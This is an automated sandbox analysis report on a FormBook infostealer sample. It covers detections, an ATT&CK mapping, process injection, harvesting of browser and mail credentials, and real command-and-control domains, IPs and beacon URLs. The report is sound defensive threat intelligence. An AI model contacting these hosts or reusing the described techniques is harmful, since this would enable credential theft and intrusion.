            Source: BP-50C26_20241220_082241.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: BP-50C26_20241220_082241.exeBinary or memory string: WIN_XPe
            Source: BP-50C26_20241220_082241.exeBinary or memory string: WIN_VISTA
            Source: BP-50C26_20241220_082241.exeBinary or memory string: WIN_7
            Source: BP-50C26_20241220_082241.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4506129755.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4507614075.0000000002C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2187412228.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4509692516.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4507710541.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2187102525.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2187890119.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4507743693.0000000002BB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C91204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00C91204
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C91806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00C91806

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		1
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets241
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials12
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1585941 Sample: BP-50C26_20241220_082241.exe Startdate: 08/01/2025 Architecture: WINDOWS Score: 100 28 www.joyesi.xyz 2->28 30 www.shenzhoucui.com 2->30 32 17 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 50 6 other signatures 2->50 10 BP-50C26_20241220_082241.exe 1 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Found API chain indicative of sandbox detection 10->64 66 Writes to foreign memory regions 10->66 68 2 other signatures 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 gaJjobDqjDYWsfRWPZSKY.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 netbtugc.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 gaJjobDqjDYWsfRWPZSKY.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.rssnewscast.com 91.195.240.94, 49985, 49986, 49987 SEDO-ASDE Germany 22->34 36 elettrosistemista.zip 195.110.124.133, 49993, 49994, 49995 REGISTER-ASIT Italy 22->36 38 5 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            BP-50C26_20241220_082241.exe37%ReversingLabsWin32.Trojan.AutoitInject
            BP-50C26_20241220_082241.exe100%AviraDR/AutoIt.Gen8
            BP-50C26_20241220_082241.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.goldenjade-travel.com/fo8o/?Dvh=YnI07v&Ubhdm=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ==100%Avira URL Cloudmalware
            http://www.elettrosistemista.zip/fo8o/?Dvh=YnI07v&Ubhdm=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ==100%Avira URL Cloudmalware
            https://www.empowermedeco.com/fo8o/?Ubhdm=mxnR0%Avira URL Cloudsafe
            http://www.3xfootball.com/fo8o/?Dvh=YnI07v&Ubhdm=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g==0%Avira URL Cloudsafe
            http://www.empowermedeco.com/fo8o/?Ubhdm=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&Dvh=YnI07v0%Avira URL Cloudsafe
            http://www.rssnewscast.com/fo8o/?Ubhdm=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&Dvh=YnI07v100%Avira URL Cloudmalware
            http://www.empowermedeco.com0%Avira URL Cloudsafe
            http://www.magmadokum.com/fo8o/?Dvh=YnI07v&Ubhdm=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA==0%Avira URL Cloudsafe
            http://www.techchains.info/fo8o/100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            elettrosistemista.zip
            		195.110.124.133
            		truefalse
              		high
              empowermedeco.com
              		217.196.55.202
              		truefalse
                		high
                www.3xfootball.com
                		154.215.72.110
                		truefalse
                  		high
                  www.goldenjade-travel.com
                  		116.50.37.244
                  		truefalse
                    		high
                    www.rssnewscast.com
                    		91.195.240.94
                    		truefalse
                      		high
                      www.techchains.info
                      		66.29.149.46
                      		truefalse
                        		high
                        natroredirect.natrocdn.com
                        		85.159.66.93
                        		truefalse
                          		high
                          www.magmadokum.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.donnavariedades.com
                            		unknown
                            		unknownfalse
                              		high
                              www.660danm.top
                              		unknown
                              		unknowntrue
                                		unknown
                                www.joyesi.xyz
                                		unknown
                                		unknownfalse
                                  		high
                                  www.liangyuen528.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.kasegitai.tokyo
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.empowermedeco.com
                                      		unknown
                                      		unknownfalse
                                        		high
                                        www.k9vyp11no3.cfd
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.elettrosistemista.zip
                                          		unknown
                                          		unknownfalse
                                            		high
                                            www.shenzhoucui.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.antonio-vivaldi.mobi
                                              		unknown
                                              		unknowntrue
                                                		unknown

                                                Contacted URLs

                                                NameMaliciousAntivirus DetectionReputation
                                                http://www.empowermedeco.com/fo8o/?Ubhdm=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&Dvh=YnI07vtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.elettrosistemista.zip/fo8o/?Dvh=YnI07v&Ubhdm=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ==true
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.empowermedeco.com/fo8o/false
                                                  		high
                                                  http://www.elettrosistemista.zip/fo8o/false
                                                    		high
                                                    http://www.magmadokum.com/fo8o/false
                                                      		high
                                                      http://www.rssnewscast.com/fo8o/false
                                                        		high
                                                        http://www.rssnewscast.com/fo8o/?Ubhdm=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&Dvh=YnI07vtrue
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://www.3xfootball.com/fo8o/?Dvh=YnI07v&Ubhdm=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g==true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.goldenjade-travel.com/fo8o/?Dvh=YnI07v&Ubhdm=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ==true
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://www.goldenjade-travel.com/fo8o/false
                                                          		high
                                                          http://www.magmadokum.com/fo8o/?Dvh=YnI07v&Ubhdm=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA==true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.techchains.info/fo8o/true
                                                          • Avira URL Cloud: malware
                                                          		unknown

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://duckduckgo.com/chrome_newtabnetbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://duckduckgo.com/ac/?q=netbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.iconetbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=netbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=netbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.empowermedeco.comgaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4509692516.00000000052A1000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.ecosia.org/newtab/netbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_netbtugc.exe, 00000004.00000002.4510433647.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4508760294.000000000426E000.00000004.10000000.00040000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4507909264.00000000039BE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.sedo.com/services/parking.php3gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4507909264.00000000039BE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          https://ac.ecosia.org/autocomplete?q=netbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://codepen.io/uzcho_/pens/popular/?grid_type=listnetbtugc.exe, 00000004.00000002.4508760294.0000000004592000.00000004.10000000.00040000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4507909264.0000000003CE2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              https://codepen.io/uzcho_/pen/eYdmdXw.cssnetbtugc.exe, 00000004.00000002.4508760294.0000000004592000.00000004.10000000.00040000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4507909264.0000000003CE2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.empowermedeco.com/fo8o/?Ubhdm=mxnRnetbtugc.exe, 00000004.00000002.4508760294.0000000004BDA000.00000004.10000000.00040000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4507909264.000000000432A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnetbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=netbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high

                                                                                    World Map of Contacted IPs

                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs

                                                                                    Public IPs

                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    91.195.240.94
                                                                                    		www.rssnewscast.comGermany
                                                                                    		47846SEDO-ASDEfalse
                                                                                    154.215.72.110
                                                                                    		www.3xfootball.comSeychelles
                                                                                    		132839POWERLINE-AS-APPOWERLINEDATACENTERHKfalse
                                                                                    195.110.124.133
                                                                                    		elettrosistemista.zipItaly
                                                                                    		39729REGISTER-ASITfalse
                                                                                    116.50.37.244
                                                                                    		www.goldenjade-travel.comTaiwan; Republic of China (ROC)
                                                                                    		18046DONGFONG-TWDongFongTechnologyCoLtdTWfalse
                                                                                    85.159.66.93
                                                                                    		natroredirect.natrocdn.comTurkey
                                                                                    		34619CIZGITRfalse
                                                                                    66.29.149.46
                                                                                    		www.techchains.infoUnited States
                                                                                    		19538ADVANTAGECOMUSfalse
                                                                                    217.196.55.202
                                                                                    		empowermedeco.comNorway
                                                                                    		29300AS-DIRECTCONNECTNOfalse

                                                                                    General Information

                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1585941
                                                                                    Start date and time:2025-01-08 14:58:07 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 10m 19s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:7
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:2
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:BP-50C26_20241220_082241.exe
                                                                                    Detection:MAL
                                                                                    Classification:mal100.troj.spyw.evad.winEXE@7/2@16/7
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 75%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 95%
                                                                                    • Number of executed functions: 45
                                                                                    • Number of non-executed functions: 296
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .exe
                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                    Warnings

                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                    • Execution Graph export aborted for target gaJjobDqjDYWsfRWPZSKY.exe, PID 3812 because it is empty
                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                    Simulations

                                                                                    Behavior and APIs

                                                                                    TimeTypeDescription
                                                                                    08:59:49API Interceptor11011852x Sleep call for process: netbtugc.exe modified

                                                                                    Joe Sandbox View / Context

                                                                                    IPs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    91.195.240.94rDHL8350232025-2.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rssnewscast.com/fo8o/
                                                                                    DHL 8350232025-1.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rssnewscast.com/fo8o/
                                                                                    DHL 745-12302024.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rssnewscast.com/fo8o/
                                                                                    DHL 806-232024.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rssnewscast.com/fo8o/
                                                                                    DHL 0737-12182024.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rssnewscast.com/fo8o/
                                                                                    DHL 073412182024.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rssnewscast.com/fo8o/
                                                                                    236236236.elfGet hashmaliciousUnknownBrowse
                                                                                    • suboyule.736t.com/
                                                                                    DHL 40312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rssnewscast.com/fo8o/
                                                                                    DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rssnewscast.com/fo8o/
                                                                                    CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rssnewscast.com/fo8o/
                                                                                    154.215.72.110wOoESPII08.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.3xfootball.com/fo8o/?xVY=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&Nz=LPhpDRap3
                                                                                    N2sgk6jMa2.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.3xfootball.com/fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=
                                                                                    Document 151-512024.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.3xfootball.com/fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q==

                                                                                    Domains

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    www.3xfootball.comrDHL8350232025-2.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    DHL 8350232025-1.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    DHL 745-12302024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    DHL 806-232024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    DHL 0737-12182024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    DHL 073412182024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    DHL 40312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    www.goldenjade-travel.comrDHL8350232025-2.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    DHL 8350232025-1.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    DHL 745-12302024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    DHL 806-232024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    DHL 0737-12182024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    DHL 073412182024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    DHL 40312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244

                                                                                    ASNs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    POWERLINE-AS-APPOWERLINEDATACENTERHKrDHL8350232025-2.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    DHL 8350232025-1.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    i686.elfGet hashmaliciousMiraiBrowse
                                                                                    • 156.244.6.20
                                                                                    z0r0.spc.elfGet hashmaliciousMiraiBrowse
                                                                                    • 156.242.206.56
                                                                                    i686.elfGet hashmaliciousMiraiBrowse
                                                                                    • 156.244.6.20
                                                                                    3.elfGet hashmaliciousUnknownBrowse
                                                                                    • 154.89.139.24
                                                                                    PKHDJwnF0I.exeGet hashmaliciousGhostRatBrowse
                                                                                    • 156.251.17.243
                                                                                    8R2YjBA8nI.exeGet hashmaliciousGhostRatBrowse
                                                                                    • 156.251.17.243
                                                                                    Hilix.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                    • 45.202.220.139
                                                                                    Hilix.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                    • 45.202.220.141
                                                                                    REGISTER-ASITrDHL8350232025-2.exeGet hashmaliciousFormBookBrowse
                                                                                    • 195.110.124.133
                                                                                    DHL 8350232025-1.exeGet hashmaliciousFormBookBrowse
                                                                                    • 195.110.124.133
                                                                                    DHL 745-12302024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 195.110.124.133
                                                                                    DHL 806-232024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 195.110.124.133
                                                                                    DHL 0737-12182024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 195.110.124.133
                                                                                    DHL 073412182024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 195.110.124.133
                                                                                    DHL 40312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 195.110.124.133
                                                                                    DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 195.110.124.133
                                                                                    SRT68.exeGet hashmaliciousFormBookBrowse
                                                                                    • 195.110.124.133
